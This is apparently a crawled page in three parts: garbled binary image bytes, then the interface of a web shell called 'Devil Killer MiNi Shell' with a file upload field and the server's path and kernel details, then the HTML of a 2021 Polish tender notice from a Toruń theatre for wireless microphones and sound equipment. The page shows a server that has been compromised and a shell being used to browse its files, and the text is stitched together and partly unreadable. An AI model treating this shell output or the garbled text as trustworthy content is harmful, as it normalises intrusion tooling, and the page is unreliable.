JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211023/0024323601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Rozbudowa systemu nagłośnienia Dużej Sceny wraz z zakupem mikroportów. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Teatr im. Wilama Horzycy</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Teatr</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871233617</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Teatralny 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">566223717</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariathorzycy@teatr.torun.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://teatr.torun.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa systemu nagłośnienia Dużej Sceny wraz z zakupem mikroportów. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-47741e09-3421-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00243236</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00230004/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Rozbudowa systemu nagłośnienia Dużej Sceny wraz z zakupem mikroportów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.teatr.torun.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu: miniPortalu https://miniportal.uzp.gov.pl/ , ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej pod adresem ug@zlawies.pl.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do<br/>komunikacji”.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publiczne (ePUAP).<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje<br/>się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularz do komunikacji” wynosi 150 MB.<br/>6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji, przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>7. Zamawiający przekazuje link do postępowania oraz ID postępowania jako odrębny plik, który<br/>zostanie opublikowany na stronie internetowej prowadzonego postępowania. Dane postępowania<br/>można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla<br/>Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>8. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy zamawiającym a wykonawcami w<br/>szczególności składanie oświadczeń, wniosków (nie dotyczy oferty i załączników do oferty),<br/>zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem<br/>dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego<br/>przez miniPortal. Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.<br/>9. We wszelkiej korespondencji kierowanej do zamawiającego, wykonawca winien posługiwać się<br/>numerem ogłoszenia (BZP lub ID postępowania) oraz nr sprawy: TH/ZP/2/2021 (pozostałe punkty zgodnie z treścią SWZ pkt 17).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że Administratorem Danych<br/>Osobowych jest Teatr im. Wilama Horzycy, Plac Teatralny 1, 87-100 Toruń, email: info@teatr.torun.pl<br/>2. W sprawach związanych z przetwarzaniem danych osobowych można kontaktować się z<br/>Inspektorem Ochrony Danych, za pośrednictwem adresu email: info@teatr.torun.pl<br/>3. Dane osobowe będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia<br/>publicznego oraz w celu archiwizacji.<br/>4. Podstawę prawną przetwarzania danych stanowi Ustawa Pzp.<br/>5. Dane osobowe będą ujawniane Wykonawcom oraz wszystkim zainteresowanym, a także podmiotom<br/>przetwarzającym dane na podstawie zawartych umów.<br/>6. Dane osobowe Wykonawcy będą przechowywane przez okres obowiązywania Umowy a następnie<br/>przez okres 5 lat począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu okresu<br/>obowiązywania Umowy. Okres ten dotyczy również Wykonawców, którzy złożyli ofertę i nie zostały one<br/>uznane za najkorzystniejsze tj. Zamawiający nie zawarł z nimi Umowy.<br/>7. Pani/Panu, których dane dotyczą przysługuje prawo dostępu do danych. Pani/Panu, których dane<br/>dotyczą przysługuje prawo wniesienia skargi do organu nadzorczego – Prezesa Urzędu Ochrony<br/>Danych (PUODO).<br/>8. Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu<br/>dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności Wykonawcy do<br/>należytego wykonania zamówienia, co skutkować może wykluczeniem Wykonawcy z postępowania lub<br/>odrzuceniem jego oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TH/ZP/2/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja zadania inwestycyjnego pn. „Rozbudowa systemu nagłośnienia Dużej Sceny wraz z zakupem mikroportów”.<br/>2.	Szczegółowy opis przedmiotu zamówienia: W ramach przedmiotowego Zamówienia przewiduje się realizację 2 części, która w pierwszym postepowaniu została unieważniona;<br/><br/>Zamówienie polegać będzie na dostawie aparatury niezbędnej do modernizacji i rozbudowy istniejącej bazy systemów bezprzewodowych.<br/><br/>a)	Nadajnik typu bodypack: 10 sztuk<br/>•	pełne pokrycie pasma słyszalnego od 20Hz do 20kHz,<br/>•	nie mniej niż 120dB dynamiki, bez potrzeby zmiany ustawień w nadajniku,<br/>•	Szyfrowanie AES 256-bit ,<br/>•	nie mniej niż 9 godzin ciągłej pracy na dwóch bateriach alkalicznych AA,<br/>•	możliwość zastosowania opcjonalnego akumulatora litowo-jonowego co pozwala na wyświetlenie pozostałego czasu pracy w godzinach i minutach,<br/>•	zewnętrzne styki pozwalają ładować cały nadajnik w ładowarce typu dock.,<br/>•	podświetlany ekran LCD do łatwego nawigowania w menu,<br/>•	możliwość wyboru opcji wyświetlania ekranu LCD. ( grupa/kanał, częstotliwość , pozostały czas pracy),<br/>•	zasięg nie mniej niż 50m w przestrzeni zamkniętej, i nie mniej niż 100m w przestrzeni otwartej (w przypadku kiedy nadajnik i odbiornik mogą się „widzieć“),<br/>•	złącze do podpięcia mikrofonu, XLR 4-pinowy męski mini wtyk (TA4M),<br/>•	konstrukcja wykonana z metalu,<br/>•	wymienna antena nadawcza,<br/>•	funkcja blokowania włącznika głównego oraz zmiany częstotliwości.<br/>•	zakres częstotliwości pracy mieszczący się między 470 Mhz a 694 Mhz z wyłączeniem pasma 607-670 Mhz.<br/><br/>b)	Odbiornik: 10 sztuk<br/>•	automatyczne wyszukiwanie wolnych kanałów,<br/>•	sieciowy Channel Scan udostępnia wolne częstotliwości między wieloma odbiornikami połączonymi przez sieć Ethernet,<br/>•	Digital Predictive Switching Diversity dla stabilnego połączenia RF,<br/>•	zdalne monitorowanie przy pomocy oprogramowania Shure Wireless Workbench®,<br/>•	nie mniej niż 60 dB regulowanego wzmocnienia dźwięku,<br/>•	pasmo dostrajania nie miej niż 72 MHz,<br/>•	szyfrowanie AES 256-bit<br/>•	wyświetlacz LCD z wysokim kontrastem, informacja na wyswietlaczu: zasięg, poziom sygnału , częstotliwość pracy , stan pracy w sieci, wzmocnienie sygnału, pozostały czas pracy nadajnika podawana w godzinach i minutach (dotyczy zasilania nadajnika akumulatorem) , elementy sterujące z funkcją blokady, a także mierniki LED audio i RF ze wskaźnikiem szczytowym,<br/>•	wyjście XLR z przełącznikiem poziomu mik/line, wyjście jack 6.3 mm,<br/>•	sumaryczne opóźnienie sygnału (latencja) w całym torze nadajnika do wyjścia odbiornika nie większe niż 2,9 ms,<br/>•	typ modulacji radiowej: specjalistyczny, sygnał cyfrowy,<br/>•	obudowa wykonana z metalu.<br/>•	zakres częstotliwości pracy mieszczący się między 470 Mhz a 694 Mhz z wyłączeniem pasma 607-670 Mhz.<br/><br/>c)	Dedykowany akumulator do nadajnika bodypack: 10 sztuk<br/>•	wykonany w technologii litowo-jonowej,<br/>•	brak efektu pamięciowego,<br/>•	nie mniej niż 8 godzin ciągłej pracy z nadajnikiem bodypack.<br/><br/>d)	Ładowarka z zasilaczem: 2 sztuki<br/>•	możliwość ładowania samego akumulatora lub nadajnika bodypack z zainstalowanym akumulatorem lub nadajnika handheld z zainstalowanym akumulatorem,<br/>•	nie mniej niż dwa stanowiska ładowania,<br/>•	możliwość łączenia nie mniej niż czterech takich ładowarek,<br/>•	informacje o stanie akumulatora: ładowanie, naładowany 100%, naładowany 90%, sygnalizowane za pomocą diód LED.<br/><br/><br/><br/>e)	Ładowarka bez zasilacza: 3 sztuki<br/>•	możliwość ładowania samego akumulatora lub nadajnika bodypack z zainstalowanym akumulatorem lub nadajnika handheld z zainstalowanym akumulatorem,<br/>•	nie mniej niż dwa stanowiska ładowania,<br/>•	możliwość łączenia nie mniej niż czterech takich ładowarek,<br/>•	informacje o stanie akumulatora: ładowanie, naładowany 100%, naładowany 90%, sygnalizowane za pomocą diód LED.<br/><br/>f)	Antena wszechkierunkowa: 2 sztuki<br/>•	odbiór dipolowy o wzorze wszechkierunkowym,<br/>•	możliwość zamontowania na statywie mikrofonowym przy użyciu standardowego uchwytu do mikrofonu bezprzewodowego,<br/>•	pasmo pracy: wartości skrajne nie mniejsze niż 470 Mhz – 1100 Mhz,<br/>•	w komplecie z przewodami BNC-BNC 50 Ohm o długości nie mniej niż 7,6m,<br/>•	waga nie więcej niż 275 gramów.<br/><br/>g)	Dystrybutor antenowy: 3 sztuki<br/>•	pasmo pracy: wartości skrajne nie mniejsze niż 470 Mhz – 694 Mhz,<br/>•	nie mniej niż 5 par BNC RF Out,<br/>•	możliwość zasilania zewnętrznych anten aktywnych,<br/>•	nie więcej niż 1U wysokości,<br/>•	możliwość montażu w raku,<br/>•	zawiera zewnętrzny zasilacz sieciowy i przewody zasilające odbiorniki (12V).<br/><br/>h)	Switch Ethernet : 2 sztuki<br/>•	nie mniej niż 8 portów ethernet<br/>i)	Przewód patchcord: 12 sztuk<br/>•	złącza RJ45,<br/>•	przewód w standardzie minimum Cat5e,<br/>•	długość nie krótsza niż 0,5m.<br/><br/>j)	Przewód 4-parowy mikrofonowy: 1 sztuka<br/>•	zakończony złączami XLRm i XLRf z oznaczeniem producenta na złączu i na przewodzie,<br/>•	nie mniej niż 3m długości.<br/><br/>k)	Przewód 6-parowy mikrofonowy: 1 sztuka<br/>•	zakończony złączami XLRm i XLRf z oznaczeniem producenta na złączu i na przewodzie<br/>•	nie mniej niż 3m długości.<br/><br/>l)	Skrzynia transportowa typu RACK 19: 1 sztuka<br/>•	wysokość użytkowa nie mniej niż 6U,<br/>•	głębokość montażowa nie mniej niż 35 cm,<br/>•	otwierany z przodu i z tyłu,<br/>•	nie mniej niż dwa uchwyty kasetowe do przenoszenia,<br/>•	wykonany w technologii flight case ze sklejki nie cieńszej niż 6,5mm.<br/>•	szyna montażowa zamontowana wystarczająco głęboko by można było zamknąć kalpę przednią bez konieczności zdejmowania anten z dystrybutora antenowego<br/><br/>m)	Skrzynia transportowa typu RACK 19: 1 sztuka<br/>•	wysokość użytkowa nie mniej niż 4U,<br/>•	głębokość montażowa nie mniej niż 35 cm,<br/>•	otwierany z przodu i z tyłu na zamki motylkowe,<br/>•	nie mniej niż dwa uchwyty kasetowe do przenoszenia,<br/>•	wykonany w technologii flight case ze sklejki nie cieńszej niż 6,5mm<br/>•	szyna montażowa zamontowana wystarczająco głęboko by można było zamknąć kalpę przednią bez konieczności zdejmowania anten z dystrybutora antenowego<br/><br/>n)	Walizka transportowa: 2 sztuki<br/>•	wykonana w technologii flight case,<br/>•	wymiary nie mniejsze niż (wys x szer x gł) 15cm x 45cm x 33cm<br/>•	możliwość indywidualnej adaptacji wielkości przegród<br/><br/>o)	Mikrofon miniaturowy nagłowny: 10 sztuk<br/>•	miniaturowy przetwornik elektretowy,<br/>•	charakterystyka kierunkowości- kardioidalna,<br/>•	pasmo przenoszenia nie węższe niż 20Hz-20kHz (+/-1dB),<br/>•	zniekształcenia harmoniczne &lt;1%THD dla poziomu nie mniejszego niż 135 dB,<br/>•	kolor zbliżony do naturalnego koloru skóry – tonacja beżowa,<br/>•	maksymalny poziom ciśnienia akustycznego dla mikrofonu dołączanego do nadajnika bezprzewodowego nie mniej niż 110 dB SPL,<br/>•	długość szyjki tzw. boom nie mniejsza niż 100 mm, nie większa niż 125 mm,<br/>•	zintegrowane złącze do nadajnika bezprzewodowego typu Mini-XLR TQG/TA4F, kompatybilne z nadajnikami bodypack,<br/>•	miniaturowa osłonka przeciw wietrzna, w zestawie elastyczny uchwyt nauszny z osłoną <br/>z tworzywa sztucznego dopuszczalne rozwiązanie na jedno lub dwoje uszu,<br/>•	ochrona przed wilgocią w stopniu nie niższym niż IP58,<br/>•	specjalistyczny elastyczny i wzmocniony kabel,<br/>•	waga kapsuły nie większa niż 30g<br/><br/>p)	Wymagania dodatkowe:<br/>•	gwarancja min. 24 m-ce na urządzenia,<br/>•	Dostarczone urządzenia muszą być fabrycznie nowe, nieużywane, wykonane zgodnie z opisem przedmiotu zamówienia i gotowe do użytku. <br/>•	Zamawiający dopuszcza złożenie oferty na urządzenia o parametrach nie gorszych niż opisane jednakże muszą być kompatybilne z istniejącym systemem nagłośnieniowym.<br/>•	Podane w opisie parametry urządzeń są parametrami minimalnymi i dopuszcza się złożenie oferty na urządzenia o parametrach lepszych niż wyspecyfikowano jednakże muszą być kompatybilne z istniejącym systemem nagłośnieniowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32342410-9 - Sprzęt dźwiękowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32340000-8 - Mikrofony i głośniki</p> <p class="mb-0">32342000-2 - Urządzenia głośnikowe</p> <p class="mb-0">32342100-3 - Słuchawki</p> <p class="mb-0">32350000-1 - Części sprzętu dźwiękowego i wideo</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z wymogami określonymi w SWZ w pkt nr 22-23.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji zamówienia i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>– Zamawiający nie wyznacza warunku w tym zakresie; <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>– Zamawiający nie wyznacza warunku w tym zakresie; <br/>3)	sytuacji ekonomicznej lub finansowej: <br/>– Zamawiający nie wyznacza warunku w tym zakresie; <br/>4)	zdolności technicznej lub zawodowej: <br/><br/><br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej 2 dostawy sprzętu nagłośnieniowego o wartości nie mniejszej niż 80 000 zł wraz z podatkiem VAT.<br/><br/>2.	W niniejszym postępowaniu zamawiający nie określa szczególnego, obiektywnie uzasadnionego, sposobu spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu.<br/>3.	Do przeliczenia na PLN wartości wskazanej w dokumentach złożonych na potwierdzenie spełniania warunków udziału w postępowaniu, wyrażonej w walutach innych niż PLN, zamawiający przyjmie średni kurs publikowany przez Narodowy Bank Polski z dnia wszczęcia postępowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają 